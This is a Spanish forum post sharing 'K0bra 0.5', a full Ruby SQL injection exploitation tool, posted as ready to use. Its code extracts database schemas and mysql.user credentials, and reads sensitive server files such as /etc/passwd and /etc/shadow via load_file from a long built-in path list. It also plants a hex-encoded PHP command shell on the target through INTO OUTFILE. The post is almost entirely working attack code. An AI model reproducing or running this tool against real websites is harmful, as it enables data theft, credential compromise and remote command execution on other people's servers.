elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Ruby] K0bra 0.5
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Ruby] K0bra 0.5  (Leído 1,585 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Ruby] K0bra 0.5
« en: 24 Julio 2015, 18:12 pm »

Version mejorada de este script en Ruby para scannear la vulnerablidad SQLI en una pagina.

El script tiene las siguientes opciones :

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados

El codigo :

Código
  1. #!usr/bin/ruby
  2. #K0bra 0.5
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "net/http"
  6. require "open-uri"
  7.  
  8. $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
  9.  
  10. def toma(web)
  11.  begin
  12.    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  13.  rescue
  14.    return "Error"
  15.  end
  16. end
  17.  
  18. def decode_hex(text)
  19.  text = text.sub("0x","")
  20.  return [text].pack('H*')[0]
  21. end
  22.  
  23. def encode_hex(text)
  24.  return "0x"+text.unpack('H*')[0]
  25. end
  26.  
  27. def copyright()
  28.  print "\n-- == (C) Doddy Hackman 2015 == --\n"
  29.  gets.chomp
  30.  exit(1)
  31. end
  32.  
  33. def installer()
  34.  dir = Dir::pwd+"/"+"logs_webs"
  35.  if not FileTest::directory?(dir)
  36.    Dir::mkdir(dir)
  37.  end
  38. end
  39.  
  40. def savefile(file,text)
  41.  url = URI.parse(file)
  42.  save = File.open("logs_webs/"+url.host+".txt","a")
  43.  save.puts text+"\n"
  44.  save.close
  45. end
  46.  
  47. def bypass(op)
  48.  if op=="--"
  49.    return "+","--"
  50.  elsif op=="/*"
  51.   return "/**/","/**/"
  52.  elsif op=="%20"
  53.   return "%20","%00"
  54.  else
  55.   return "+","--"    
  56.  end
  57. end
  58.  
  59. def head()
  60.  clean()
  61.  print "
  62.  
  63. @      @@   @            
  64. @@     @  @ @@            
  65. @ @@  @  @  @ @   @ @ @@@
  66. @ @   @  @  @@ @ @@@ @  @
  67. @@    @  @  @  @  @   @@@
  68. @ @   @  @  @  @  @  @  @
  69. @@@ @   @@   @@@  @@@ @@@@@
  70.  
  71. "
  72. end
  73.  
  74. def volverinicio()
  75.  print "\n\n[+] Press any key to continue\n\n"
  76.  gets.chomp
  77.  inicio()
  78. end
  79.  
  80. def clean()
  81.  if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
  82.    system("cls")
  83.  else
  84.    system("clear")
  85.  end
  86. end
  87.  
  88. def retorno(url,by)
  89.  print "\n[+] Finished"
  90.  print "\n\n[+] Press any key to continue\n\n"
  91.  gets.chomp
  92.  central(url,by)
  93. end
  94.  
  95. def gettables(url,by)
  96.  pass1,pass2 = bypass(by)
  97.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  98.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  99.  print "\n[+] Getting tables ...\n\n"
  100.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  101.  if code1=~/K0BRA(.*?)K0BRA/
  102.    total = $1
  103.    print "[+] Tables Found : ",total,"\n\n"
  104.    savefile(url,"\n[+] Tables Found : #{total}\n")
  105.    for num in ("17"..total)
  106.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
  107.      if code2=~/K0BRA(.*?)K0BRA/
  108.        table = $1
  109.        print "[+] Table Found : "+table+"\n"
  110.        savefile(url,"[+] Table Found : #{table}")
  111.      end
  112.    end
  113.  else
  114.    print "[-] Not Found\n"
  115.  end
  116. end
  117.  
  118. def getcolumns(url,by,tablex)
  119.  tablexa = encode_hex(tablex)
  120.  pass1,pass2 = bypass(by)
  121.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  122.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  123.  print "\n[+] Getting columns ...\n\n"
  124.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  125.  if code1=~/K0BRA(.*?)K0BRA/
  126.    total = $1
  127.    print "[+] Columns Found : ",total,"\n\n"
  128.    savefile(url,"\n[+] Table : #{tablex}")
  129.    savefile(url,"[+] Columns Found : #{total}\n")
  130.    for num in ("0"..total)
  131.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
  132.      if code2=~/K0BRA(.*?)K0BRA/
  133.        table = $1
  134.        print "[+] Column Found : "+table+"\n"
  135.        savefile(url,"[+] Column Found : #{table}")
  136.      end
  137.    end
  138.  else
  139.    print "[-] Not Found\n"
  140.  end
  141. end
  142.  
  143. def getdbs(url,by)
  144.  pass1,pass2 = bypass(by)
  145.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  146.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  147.  print "\n[+] Getting DBS ...\n\n"
  148.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  149.  if code1=~/K0BRA(.*?)K0BRA/
  150.    total = $1
  151.    print "[+] DBS Found : ",total,"\n\n"
  152.    savefile(url,"\n[+] DBS Found : #{total}\n")
  153.    for num in ("0"..total)
  154.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
  155.      if code2=~/K0BRA(.*?)K0BRA/
  156.        table = $1
  157.        print "[+] DB Found : "+table+"\n"
  158.        savefile(url,"[+] DB Found : #{table}")
  159.      end
  160.    end
  161.  else
  162.    print "[-] Not Found\n"
  163.  end
  164. end
  165.  
  166. def gettablesbydb(url,by,dbx)
  167.  data  = encode_hex(dbx)
  168.  pass1,pass2 = bypass(by)
  169.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  170.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  171.  print "\n[+] Getting tables ...\n\n"
  172.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  173.  if code1=~/K0BRA(.*?)K0BRA/
  174.    total = $1
  175.    print "[+] Tables Found : ",total,"\n\n"
  176.    savefile(url,"\n[+] DBS : #{dbx}")
  177.    savefile(url,"[+] Tables Found : #{total}\n")
  178.    for num in ("0"..total)
  179.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  180.      if code2=~/K0BRA(.*?)K0BRA/
  181.        table = $1
  182.        print "[+] Table Found : "+table+"\n"
  183.        savefile(url,"[+] Table Found : #{table}")
  184.      end
  185.    end
  186.  else
  187.    print "[-] Not Found\n"
  188.  end
  189. end
  190.  
  191. def getcolumnsbydb(url,by,db,tab)
  192.  data = encode_hex(db)
  193.  tabx = encode_hex(tab)
  194.  
  195.  pass1,pass2 = bypass(by)
  196.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  197.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  198.  print "\n[+] Getting columns ...\n\n"
  199.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  200.  if code1=~/K0BRA(.*?)K0BRA/
  201.    total = $1
  202.    print "[+] Columns Found : ",total,"\n\n"
  203.    savefile(url,"\n[+] DB : #{db}")
  204.    savefile(url,"[+] Table : #{tab}")
  205.    savefile(url,"[+] Columns Found : #{total}\n")
  206.    for num in ("0"..total)
  207.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  208.      if code2=~/K0BRA(.*?)K0BRA/
  209.        table = $1
  210.        print "[+] Column Found : "+table+"\n"
  211.        savefile(url,"[+] Column Found : #{table}")
  212.      end
  213.    end
  214.  else
  215.    print "[-] Not Found\n"
  216.  end
  217. end
  218.  
  219. def mysqluser(url,by)
  220.  pass1,pass2 = bypass(by)
  221.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  222.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
  223.   print "\n[+] Searching mysql.user\n\n"
  224.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  225.  if code1=~/K0BRA(.*?)K0BRA/
  226.    total = $1
  227.    print "[+] Users Mysql Found : ",total,"\n\n"
  228.    savefile(url,"[+] Users Mysql Found : "+total+"\n")
  229.    for num in ("0"..total)
  230.      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
  231.      if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
  232.        host,user,passw = $1,$2,$3
  233.        print "[Host] : "+host
  234.        print " [User] : "+user
  235.        print " [Pass] : "+passw+"\n"  
  236.        savefile(url,"[Host] : "+host)
  237.        savefile(url,"[User] : "+user)
  238.        savefile(url,"[Pass] : "+passw+"\n")
  239.      end
  240.    end
  241.  else
  242.    print "[-] Not Found\n"
  243.  end
  244. end
  245.  
  246. def details(url,by)
  247.  pass1,pass2 = bypass(by)
  248.  hextest = "0x2f6574632f706173737764" #/etc/passwd
  249.  hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  250.  web1 = url.sub(/hackman/,"0x4b30425241")
  251.  web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  252.  web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
  253.   print "\n[+] Extrating information of the DB\n"
  254.  code1 = toma(web2)
  255.  if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
  256.    user,data,ver = $1,$2,$3
  257.    print "\n[+] Username : "+user
  258.    print "\n[+] Database : "+data
  259.    print "\n[+] Version : "+ver+"\n\n"
  260.    savefile(url,"\n[+] Username : "+user)
  261.    savefile(url,"[+] Database : "+data)
  262.    savefile(url,"[+] Version : "+ver+"\n")
  263.  else
  264.    print "[-] Not Found\n"
  265.  end
  266.   code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  267.   code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  268.   code4 = toma(web3)
  269.   if code2=~/K0BRA/
  270.     print "[+] Mysql User : ON\n"
  271.     savefile(url,"[+] Mysqluser : ON")
  272.   end
  273.   if code3=~/K0BRA/
  274.     print "[+] information_schema : ON\n"
  275.     savefile(url,"[+] information_schema : ON")
  276.   end
  277.   if code4=~/ERTOR854/
  278.     print "[+] load_file : ON\n"
  279.     savefile(url,"[+] load_file : ON")
  280.   end  
  281.   savefile(url,"") #espacio en blanco
  282. end
  283.  
  284. def dumper(url,by,table,col1,col2)
  285.  pass1,pass2 = bypass(by)
  286.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  287.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  288.  print "\n[+] Getting Values ...\n\n"
  289.  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  290.  if code1=~/K0BRA(.*?)K0BRA/
  291.    total = $1
  292.    savefile(url,"\n[+] Table : "+table)
  293.    savefile(url,"[+] Column 1 : "+col1)
  294.    savefile(url,"[+] Column 2 : "+col2)
  295.    print "[+] Values Found : ",total,"\n"
  296.    savefile(url,"\n[+] Values Found : #{total}\n")
  297.    for num in ("0"..total)
  298.      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
  299.      if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
  300.        uno,dos = $1,$2
  301.        print "\n[+] "+col1+" : "+uno+"\n"
  302.        print "[+] "+col2+" : "+dos+"\n"
  303.        savefile(url,"\n[+] "+col1+" : "+uno)
  304.        savefile(url,"[+] "+col2+" : "+dos)
  305.      end
  306.    end
  307.  else
  308.    print "[-] Not Found\n"
  309.  end
  310. end
  311.  
  312. def fuzzfile(url,by)
  313.  pass1,pass2 = bypass(by)
  314.  print "\n[+] Fuzzing Files with load_file ....\n"
  315.  $files.each do |file|
  316.    res = file
  317.    file = file.chomp
  318.    file = encode_hex(file)
  319.    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  320.    code = toma(web1)
  321.    if code=~/ERTOR854(.*?)ERTOR854/m
  322.      print "\n\n[File Found] : ",res
  323.      print "\n\n[Source Start]\n"
  324.      print $1
  325.      print "\n[Source End]"
  326.      savefile(url,"\n[File Found] : "+res)
  327.      savefile(url,"\n[Source Start]\n")
  328.      savefile(url,$1)
  329.      savefile(url,"\n[Source End]")
  330.    end    
  331.  end
  332.  print "\n"
  333. end
  334.  
  335. def abrirfile(url,by,file)
  336.  pass1,pass2 = bypass(by)
  337.  print "\n[+] Opening file ....\n"
  338.  res = file
  339.  file = encode_hex(file)
  340.    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  341.    code = toma(web1)
  342.    if code=~/ERTOR854(.*?)ERTOR854/m
  343.      print "\n\n[File Found] : ",res
  344.      print "\n\n[Source Start]\n"
  345.      print $1
  346.      print "\n[Source End]\n"
  347.      savefile(url,"\n[File Found] : "+res)
  348.      savefile(url,"\n[Source Start]\n")
  349.      savefile(url,$1)
  350.      savefile(url,"\n[Source End]\n")
  351.    else
  352.      print "\n\n[-] Error\n\n"
  353.    end
  354.  
  355. end
  356.  
  357. def into(url,by,full,dir)
  358.  pass1,pass2 = bypass(by)
  359.  linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  360.  lugar = full+"/cmd.php"
  361.  lugardos = dir+"/cmd.php"
  362.  h = URI.parse(url)
  363.  webtest = "http://"+h.host+lugardos
  364.  web1 = url.sub(/hackman/,linea)
  365.  formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  366.  toma(formandoweb)
  367.  code = toma(webtest)
  368.  if code=~/Mini Shell By Doddy/
  369.    print "\n[Shell Up] : "+webtest+"\n"
  370.    savefile(url,"\n[Shell Up] : "+webtest+"\n")
  371.  else
  372.    print "\n\n[-] Error\n"
  373.  end
  374. end
  375.  
  376. def central(url,by)
  377.  clean()
  378.  head()
  379.  print "\n\n[+] Page : #{url}\n"
  380.  print "[+] ByPass : #{by}\n\n"
  381.  
  382.  print "\n[information_schema]\n\n"
  383.  print "1 - Show tables\n"
  384.  print "2 - Show columns of the a table\n"
  385.  print "3 - Show databases\n"
  386.  print "4 - Show tables from the a DB\n"
  387.  print "5 - Show columns from the a table of the DB\n"
  388.  print "\n[mysql.user]\n\n"
  389.  print "6 - Show users\n"
  390.  print "\n[Others]\n\n"
  391.  print "7 - Show details\n"
  392.  print "8 - Dump data\n"
  393.  print "9 - Fuzz Files with load_file\n"
  394.  print "10 - Load files with load_file\n"
  395.  print "11 - Create Shell\n"
  396.  print "12 - Show log\n"
  397.  print "13 - Change target\n"
  398.  print "14 - Exit\n\n\n"
  399.  
  400.  print "[+] Option : "
  401.  op = gets.chomp
  402.  print "\n"
  403.  
  404.  if op == "1"
  405.    gettables(url,by)
  406.    retorno(url,by)
  407.  elsif op == "2"
  408.    print "\n[+] Table : "
  409.    table = gets.chomp
  410.    getcolumns(url,by,table)
  411.    retorno(url,by)
  412.  elsif op == "3"
  413.    getdbs(url,by)
  414.    retorno(url,by)
  415.  elsif op == "4"
  416.    print "\n[+] DB : "
  417.    db = gets.chomp
  418.    gettablesbydb(url,by,db)
  419.    retorno(url,by)
  420.  elsif op == "5"
  421.    print "\n[+] DB : "
  422.    db = gets.chomp
  423.    print "\n[+] Table : "
  424.    tab = gets.chomp
  425.    getcolumnsbydb(url,by,db,tab)
  426.    retorno(url,by)
  427.  elsif op == "6"
  428.    mysqluser(url,by)
  429.    retorno(url,by)
  430.  elsif op == "7"
  431.    details(url,by)
  432.    retorno(url,by)
  433.  elsif op == "8"
  434.    print "\n[+] Table : "
  435.    table = gets.chomp
  436.    print "\n[+] Column 1 : "
  437.    col1 = gets.chomp
  438.    print "\n[+] Column 2 : "
  439.    col2 = gets.chomp
  440.    dumper(url,by,table,col1,col2)
  441.    retorno(url,by)
  442.  elsif op == "9"
  443.    fuzzfile(url,by)
  444.    retorno(url,by)
  445.  elsif op == "10"
  446.    print "\n[+] File : "
  447.    file = gets.chomp
  448.    abrirfile(url,by,file)
  449.    retorno(url,by)
  450.  elsif op == "11"
  451.    print "\n[Full Source Discloure] : "
  452.    full = gets.chomp
  453.    print "\n[Directory to test] : "
  454.    dir = gets.chomp
  455.    into(url,by,full,dir)
  456.    retorno(url,by)
  457.  elsif op == "12"
  458.    urla = URI.parse(url)
  459.    ar = "logs_webs/"+urla.host+".txt"
  460.    system("start #{ar}")
  461.    retorno(url,by)
  462.  elsif op == "13"
  463.    inicio()
  464.  elsif op == "14"
  465.    copyright()
  466.  else
  467.    retorno(url,by)
  468.  end
  469. end
  470.  
  471. def findlength(url,by)
  472.  pass1,pass2 = bypass(by)
  473.  z = "1"
  474.  print "\n[+] Finding columns lenght ...\n\n"
  475.  x = "concat(0x4b30425241,1,0x4b30425241)"
  476.  for num in ('2'..'25')
  477.    z = z+","+num
  478.    x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
  479.    code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
  480.    if code=~/K0BRA(.*?)K0BRA/
  481.      print "[+] The Page has "+num+" columns\n"
  482.      print "[+] The number "+$1+" print data"
  483.      z = z.sub($1,"hackman")
  484.      sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
  485.      savefile(url,"[+] SQLI : "+sqli)
  486.      savefile(url,"[+] Bypass : "+by+"\n")
  487.      central(sqli,by)
  488.    end
  489.  end
  490.  print "[-] Columns lenght not found\n"
  491.  volverinicio()
  492. end
  493.  
  494. def testvul(page,by)
  495.  pass1,pass2 = bypass(by)
  496.  print "\n\n[+] Testing vulnerability ...\n\n"
  497.  codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  498.  codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  499.  if codeuno != codedos
  500.    print "[+] Vulnerable !\n"
  501.    findlength(page,by)
  502.  else
  503.    print "[-] Not vulnerable\n"
  504.    print "\n[+] Scan anyway y/n : "
  505.    op = gets.chomp
  506.    if op == "y"
  507.      findlength(page,by)
  508.    else
  509.      volverinicio()
  510.  end
  511. end  
  512. end
  513.  
  514. def inicio()
  515.  clean()
  516.  head()
  517.  print "\n\n[+] Page : "
  518.  page = gets.chomp
  519.  print "\n[+] Bypass : "
  520.  by = gets.chomp
  521.  if page=~/hackman/
  522.    central(page,by)
  523.  else
  524.    testvul(page,by)
  525.  end
  526. end
  527.  
  528. installer()
  529. inicio()
  530.  
  531. # The End ?
  532.  

Eso es todo.


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Introducing Ruby] Lo que debes saber sobre Ruby
Scripting
RyogiShiki 0 9,571 Último mensaje 4 Marzo 2011, 20:45 pm
por RyogiShiki
[Perl] K0bra 0.5
Scripting
BigBear 0 2,424 Último mensaje 10 Octubre 2011, 16:53 pm
por BigBear
[Perl] K0bra 1.5
Scripting
BigBear 0 1,959 Último mensaje 1 Diciembre 2011, 22:14 pm
por BigBear
[Ruby] k0bra 0.3
Scripting
BigBear 0 2,540 Último mensaje 16 Febrero 2012, 18:16 pm
por BigBear
[C#] K0bra 1.0
.NET (C#, VB.NET, ASP)
BigBear 0 1,918 Último mensaje 15 Agosto 2014, 16:57 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines